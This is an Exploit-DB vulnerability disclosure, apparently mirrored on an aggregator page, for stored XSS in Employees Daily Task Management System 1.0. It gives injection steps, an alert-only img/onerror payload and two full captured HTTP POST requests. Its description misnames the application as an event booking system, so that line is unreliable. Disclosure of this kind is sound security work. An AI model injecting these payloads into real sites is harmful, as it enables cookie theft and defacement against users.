Employees Daily Task Management System 1.0 – ‘multiple’ Cross Site Scripting (XSS)

• Exploit Database
• 19 阅读

• 作者： able403
  日期： 2021-12-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50583/

• # Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
  # Exploit Author: able403
  # Date: 08/12/2021
  # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
  # Version: 1.0
  # Tested on: windows 10 
  # Vulnerable page: ?page=view_task&id=2
  
  Technical description:
  
  A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. 
  
  xss-1:
  
  1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task"
  2) Insert your payload in the "title" and "Task Description" parameter parameter
  3) Click save
  
  Proof of concept (Poc):
  
  The following payload will allow you to run the javascript - 
  
  "><img src=# onerror=alert(123)>
  
  ---
  POST /Actions.php?a=save_task HTTP/1.1
  
  Host: localhost
  
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  
  Accept: application/json, text/javascript, */*; q=0.01
  
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  
  Accept-Encoding: gzip, deflate
  
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  
  X-Requested-With: XMLHttpRequest
  
  Content-Length: 312
  
  Origin: http://localhost
  
  Connection: close
  
  Referer: http://localhost/?page=tasks
  
  Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
  
  
  
  
  id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E
  
  
  
  
  
  
  
  xss-2 
  
  1) Navigate to http://localhost.com/?page=manage_account
  2) Insert your payload in the "full name" or "contact" or "email"parameter parameter
  
  Proof of concept (Poc):
  
  The following payload will allow you to run the javascript - 
  
  "><img src=# onerror=alert(123)>
  
  
  
  
  --
  
  POST /Actions.php?a=update_credentials_employee HTTP/1.1
  
  Host: localhost
  
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  
  Accept: application/json, text/javascript, */*; q=0.01
  
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  
  Accept-Encoding: gzip, deflate
  
  X-Requested-With: XMLHttpRequest
  
  Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384
  
  Content-Length: 1613
  
  Origin: http://localhost
  
  Connection: close
  
  Referer: http://localhost/?page=manage_account
  
  Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
  
  
  
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="id"
  
  
  
  
  1
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="fullname"
  
  
  
  
  John D Smith
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="gender"
  
  
  
  
  Male
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="dob"
  
  
  
  
  1997-06-23
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="contact"
  
  
  
  
  098123456789"><img src=# onerror=alert(123)>
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="email"
  
  
  
  
  jsmith@sample.com
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="address"
  
  
  
  
  Sample Address
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="department_id"
  
  
  
  
  1
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="email"
  
  
  
  
  jsmith@sample.com
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="password"
  
  
  
  
  
  
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="old_password"
  
  
  
  
  
  
  
  -----------------------------27882107026209045483167935384
  
  Content-Disposition: form-data; name="avatar"; filename=""
  
  Content-Type: application/octet-stream
  
  
  
  
  
  
  
  -----------------------------27882107026209045483167935384--